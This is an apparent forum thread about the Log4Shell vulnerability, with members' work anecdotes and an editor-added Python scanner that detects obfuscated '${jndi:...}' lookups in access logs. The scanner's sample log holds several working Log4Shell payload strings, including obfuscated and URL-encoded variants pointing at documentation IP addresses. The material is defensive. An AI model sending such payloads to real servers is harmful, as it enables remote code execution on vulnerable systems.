OT: Since it is popping up in the news Log4j


Unfortunately this has been dominating my work life since Friday. While it's true there's not anything a normal user can do, it's legitimately one of the worst vulnerabilities to come along in a long time due to the combination of being fairly easy to exploit, plus it's a remote code vulnerability - meaning you can get a target server to run malicious code directly. It's got a vulnerability score of 10.0, the highest there is. The underlying Log4j component is present in lots of Java environments, even if it's not being used, so the impact is very wide. Web apps of all sorts are vulnerable, and so for a lot of companies it's a combination of fixing the ones coded in-house, plus waiting for the vendors of vulnerable off-the-shelf software to fix theirs.
"If you can't dazzle them with dexterity, baffle them with bullshit."
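The post above describes why Log4Shell was so bad (easy to trigger, remote code execution, Log4j buried in lots of Java stacks) but not what the trigger looks like on the wire or how to find it in your own logs. As an added example, not from this thread and not Log4j project code, here is a small Python scanner that undoes the Log4j 2 lookup tricks attackers used to hide the `${jndi:...}` string (nested `${...}`, `${lower:...}`/`${upper:...}`, and the `key:-default` form such as `${::-j}` or `${env:NOPE:-j}`), URL-decodes the line once, and then looks for a jndi lookup. The log lines, IP addresses (RFC 5737 documentation ranges) and function names are all constructed for the example.

```python
"""Log4Shell (CVE-2021-44228) log-line scanner.

Editor-added example, not code from the forum thread or from Log4j.
It statically applies the lookup rules attackers abused so that an
obfuscated payload collapses back to ${jndi:...} before we search for it.
"""
import re
from urllib.parse import unquote

# Innermost ${...}: a body with no nested "${" or "}" in it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Log4j lower-cases the lookup prefix, so "${JNDI:" is as live as "${jndi:".
# Group 1 is the URL scheme (ldap, rmi, dns, ...) when one follows.
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+)?", re.IGNORECASE)


def _resolve(body: str):
    """Resolve one lookup body the way Log4j 2's Interpolator would when
    the lookup itself yields nothing. Returns replacement text, or None
    to leave the lookup untouched.

    ${lower:X} / ${upper:X} are evaluated. "key:-default" falls back to
    the default, i.e. we assume env/sys/date lookups fail, which is what
    the ${env:NOPE:-j} and empty ${::-j} forms rely on. A jndi body is
    never collapsed: Log4j performs that lookup before any default."""
    if body.lstrip().lower().startswith("jndi:"):
        return None
    if ":-" in body:
        key, default = body.split(":-", 1)
        prefix, sep, rest = key.partition(":")
        if sep and prefix.lower() == "lower":
            return rest.lower()
        if sep and prefix.lower() == "upper":
            return rest.upper()
        return default
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None


def normalize_lookups(text: str, max_rounds: int = 64) -> str:
    """Collapse innermost ${...} lookups round by round until nothing
    changes. Every productive round removes at least one lookup, so
    max_rounds is only a guard against pathological input."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def find_log4shell(lines):
    """Return (index, scheme) for every line carrying a jndi lookup after
    one URL-decoding pass and lookup normalization. scheme is the
    lower-cased URL scheme or '' if none followed 'jndi:'."""
    hits = []
    for i, line in enumerate(lines):
        # Payloads in request paths usually arrive as %24%7Bjndi...;
        # double-encoded input would need a second unquote() pass.
        norm = normalize_lookups(unquote(line))
        m = _JNDI.search(norm)
        if m:
            hits.append((i, (m.group(1) or "").lower()))
    return hits


# Constructed access-log lines (not real traffic). Lines 1-5 carry a
# payload in the User-Agent or query string; 0 and 6 must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:20 +0000] "GET / HTTP/1.1" 200 612 "-" "${JNDI:rmi://203.0.113.99:1099/x}"',
    '203.0.113.8 - - [10/Dec/2021:14:03:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.99:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:03:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.99:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.99%2Fa%7D HTTP/1.1" 200 612 "-" "curl/7.79.1"',
    '203.0.113.10 - - [10/Dec/2021:14:04:00 +0000] "GET / HTTP/1.1" 200 612 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    for idx, scheme in find_log4shell(SAMPLE_LOG):
        print(f"line {idx}: jndi lookup via {scheme or '?'}")
```

Two caveats worth keeping in mind when running something like this over real logs: it only decodes one layer of URL encoding, and it only models the `lower`, `upper` and default-value tricks, so other lookups that can emit characters (for instance `date` patterns with quoted literals) would still slip past. It is a triage aid for finding attempts in what you already logged, not a substitute for upgrading log4j-core.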

I do feel sympathy for former colleagues who may have had to work extra hours due to log4j. I've never seen log4j used to execute code. I'm sure the smartest peeps on the past Java-focused projects I worked on were aware of that feature, but we used log4j to.... just write to log files... and Java code to do what code does... how about that? If I were still working at my last job, I probably would have had a very busy last couple of days too.

 

I now work with a team that develops software primarily with .NET C#. Coming from a Java background, I've had to deal with some learning curves, like how .NET handles logging compared to Java.


This crap makes me long for my old IBM Selectric. It woke the dead while in operation, but it never crashed. :facepalm:

Lab Mode splits between contemplative work and furious experiments.
Both of which require you to stay the hell away from everyone else.
This is a feature, not a bug.
Kraftwerk’s studio lab, Kling Klang, didn’t even have a working phone in it.
~ Warren Ellis


That caused a pretty big stir over the weekend at work, various dev teams had to upgrade apps and integrations.

 

I'm over on the database side of things, the world of development has left me in the dust over the past decade and a half (and to be fair, I was always just a web application scripter anyway). All the frameworks and dependencies and ORMs...not to mention the crazy front end which was what I was primarily fleeing from :) "But I wanted that special color of blue!" "er...we agreed on the exact color during the last meeting..." Kill me now if I ever have to work with front-end clients again.


Ehm, this subject also kept my professional life busy this week (software security, or rather the lack of it, is what pays my salary every month).

 

And finally I discovered that the real threat is the Minecraft server running at home on a Mac Mini, which I manage with my 15-year-old son.

 

Maurizio

Nord Wave 2, Nord Electro 6D 61, Rameau upright, Hammond Pro44H Melodica.

Too many Arturia, NI and AAS plugins

http://www.barbogio.org/

https://barbogio.bandcamp.com/follow_me

 

